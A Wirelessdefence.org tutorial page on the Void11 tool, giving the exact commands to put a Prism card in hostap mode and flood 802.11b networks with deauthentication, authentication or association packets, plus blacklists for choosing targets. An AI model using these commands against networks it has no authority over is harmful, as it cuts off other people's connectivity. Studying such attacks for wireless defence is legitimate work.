Linux

 

Linux tools, Howtos

 

Tools Index

 

Wireless Commands

 

FC6 Build Howto

 

FC5 Build Howto

 

FC4 Build Howto

 

Live Linux Distros

 

 

Site Search

 

 

 

 

Windows

 

WIN32 tools, Howtos

 

Tools Index

 

 

Get Firefox!

 

 

General

 

Miscellaneous WI-FI

 

Default WI-FI Settings

 

Rogue AP Howtos

 

WI-FI Certifications

 

802.11 Standards

 

STEP BY STEP Guides

 

Formats / Extensions

 

WI-FI Home Security

 

Useful Links

 

 

 

 

Void11 Main:

Project homepage: http://www.wlsec.net/void11

Local Mirror: void11-0.2.0.tar.bz2   MD5: 1c5b3e3e70916de74c2932c7f3e46d9e

"Void11 a  free implementation of some basic 802.11b attacks." -www.wlsec.net

Installing Void11

 

NOTE: Void11 only works with the hostap driver (e.g. the Prism card)

 

 

Void11 Attacks:

Void11 offers three attack mechanisms:

Deauthenticate Clients (default mode):

  • Floods the WLAN with deauthentication packets - authenticated clients will drop their network connections.

Authentication Flood:

  • Floods access points with authentication packets (random client MACs), results depend on equipment manufacturer.

Association Flood:

  • Floods access points with association packets (random client MACs), results depend on equipment manufacturer.

 

Using Void11:

ensure your prism card is inserted

cd /tools/wifi/void11-0.2.0/console

iwconfig wlan0 mode master (set card to master mode)

iwpriv wlan0 hostapd 1 (set card to hostapd mode)

./void11_hopper (set the card to hop between all 14 channels)

Or as an alternative to using void_hopper mode - set the card to the desired channel manually:

  • iwconfig wlan0 channel 6 (set card to channel 6)

Now the card is configured for the actual attacks:

Usage: void11_penetration  [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

e.g. void11_penetration  wlan0 -D  -t 1 -s 00:06:25:2D:09:68 -B 00:06:02:35:AB:06

 

 

void11_penetration switches:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

void11_penetration in use:

 

 

Disassociation mode (-t 1) seems by far the most effective actually dropping the network connection between servers and clients.

Authentication flood mode (-t 2) also proves very effective whilst not physically dropping the client connection all data transfer across the network ground to a halt.

Association flood mode (-t 3) also proves very effective whilst not physically dropping the client connection all data transfer across the network ground to a halt.

 

 

Whitelists and Blacklists:

Void11 also offers the -l and -p switches for use with the whitelists and blacklists.  A whitelist is simply a list of SSIDs/BSSIDs that you do not want to attack (i.e. your home network), while a blacklist is a set of SSIDs/BSSIDs that would want to attack (i.e. a wardriver).

Usage: void11 -l [list name] -p [0=whitelist (default), 1=blacklist]

There is a default matchlist in the void11/console directory.  A typical matchlist may contain:

B 00:06:BF:64:AB:35 (B=BSSID)

S MYSSID (S=SSID)

 

 

Using a Whitelist:

 

Now if we use void11 with the syntax:

void11 -D -l matchlist wlan0

void11 treats the matchlist as a whitelist and will not attack any BSSIDs listed.

 

 

Using a Blacklist:

 

However if we use void11 with the syntax

void11 -D -l matchlist -p 1 wlan0

void11 treats the matchlist as a blacklist and will only attack any BSSID listed.

 

Be aware that if you are using the S (SSID) option with a whitelist and the SSID is not broadcast by the access point then that access point will be treated as blacklisted as void11 cannot see its SSID (unless there is a blank S entry in the matchlist)

 

 

gvoid11:

Void11 also provides a GTK+ GUI front-end called gvoid11 which looks very good and offers many features of the command line tool.  Type 'gvoid11' to start the GUI tool: 

 

  
 
  © Copyright 2005-2006 Wirelessdefence.org. All Rights Reserved.